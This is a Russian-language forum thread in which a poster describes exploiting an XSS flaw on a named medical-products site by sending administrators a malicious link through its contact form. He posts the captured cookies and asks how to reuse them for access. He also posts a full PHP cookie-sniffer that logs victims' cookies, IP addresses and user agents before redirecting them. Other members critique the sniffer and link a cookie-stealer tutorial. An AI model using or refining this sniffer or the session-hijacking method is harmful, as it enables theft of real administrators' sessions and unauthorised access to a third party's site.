Всех с новым годом! На сайте есть xss, отправил письмо админам через Contact Us с уязвимой ссылкой. Они с удовольствием мне ответили и перешли по ссылке) Что имею: COOKIE: c=_fbp=fb.1.1574624035664.2123872372;%20_ga=GA1.2.1849478661.1574626518;%20__utma=43491835.1849478661.1574626518.1574705004.1574742788.3;%20__utmz=43491835.1574742788.3.3.utmcsr=admin.ohmedical.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/82077/ Сама XSS на основном домене, а куки зацепились и с субдомена тоже. Подставляю на сколько хватает мозгов : либо сессия закончилась, либо не правильно вставил? есть какой-то вариант импортировать в таком виде, в каком они снифаются? без танцев с бубном))
как можно дополнить сниффер, чтобы он собирал по максимуму? или каждый раз рандом будет? сейчас такой код. частиточно прилетели же куки с субдомена админского... Spoiler: Спойлер <?php function GetIP() { if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } function logData() { $ipLog="log.txt"; $cookie = $_SERVER['QUERY_STRING']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) $ip = getenv('REMOTE_ADDR'); else $ip = GetIP(); $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>"); else fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); fclose($log); header ('Location:тут линк на сайт указываю'); } logData(); ?>
У тебя Басик аутентификация что бы ей пройти у тебя должен передаваться заголовок соответствующий с цветными данными. Чего собственно у тебя на ту. Судя по предоставленным тобой данным
Вы на машине времени прилетели? cookies и QUERY_STRING разные вещи. Это вообще что за... Регулярка ищет в переменной НО НЕ в содержимом файла. И почему 2 регулярки идентичны? Загуглите готове решение у меня уже кровь из глаз от ваших постов идет.
да я не сам это писал, это копи пасте) вариантов кода много разных на счет воровства кукисов. подумал, что чем больше информации состилит, тем легче будет пробраться, поэтому и выбрал самый большой код) откуда уже не помню
Ну ваш снифер кривой, устревшие методы/функции. Копирование кода без его понимания чревовато. Прежде чем что-то поломать нужно понимать как его построить или как оно работает. https://null-byte.wonderhowto.com/h...e-stealer-javascript-steal-passwords-0180833/